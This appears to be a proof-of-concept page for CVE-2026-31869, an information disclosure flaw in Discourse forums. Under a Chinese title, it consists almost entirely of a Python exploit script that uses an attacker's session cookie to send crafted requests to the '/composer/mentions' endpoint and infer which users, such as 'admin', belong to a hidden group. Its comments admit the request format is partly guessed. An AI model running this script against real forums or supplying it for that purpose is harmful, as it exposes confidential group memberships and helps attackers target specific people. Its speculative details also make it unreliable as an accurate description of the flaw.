CVE-2026-31869: Discourse隐藏群组成员信息泄露漏洞

import requests # CVE-2026-31869 PoC: Discourse Hidden Group Membership Disclosure # Preconditions: Attacker has a valid authenticated session (cookie/token). TARGET_URL = "https://target-discourse.com" API_PATH = "/composer/mentions" HIDDEN_GROUP = "confidential_group" # Name of the hidden group # Attacker's session cookie SESSION_COOKIE = "_forum_session=attacker_cookie_value_here" def probe_hidden_group_membership(username): headers = { "Cookie": SESSION_COOKIE, "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest" } # Payload structure based on the vulnerability description payload = { "allowed_names": HIDDEN_GROUP, # Referencing the hidden group "usernames": username, # Probing arbitrary username "topic_id": "1" # Context ID (may be required by controller) } try: response = requests.post(f"{TARGET_URL}{API_PATH}", headers=headers, data=payload) if response.status_code == 200: data = response.json() # Logic: Check user_reasons for the specific indicator user_reasons = data.get("user_reasons", {}) if username in user_reasons: reason = user_reasons[username] # If reason is 'private', it implies membership in the hidden group if reason == "private": print(f"[+] Confirmed: User '{username}' is a member of hidden group '{HIDDEN_GROUP}'") return True else: print(f"[-] Not a member or public: User '{username}' (Reason: {reason})") else: print(f"[-] User '{username}' not found in results") else: print(f"Request failed with status code: {response.status_code}") except Exception as e: print(f"An error occurred: {e}") if __name__ == "__main__": # Example usage probe_hidden_group_membership("admin") probe_hidden_group_membership("suspect_user")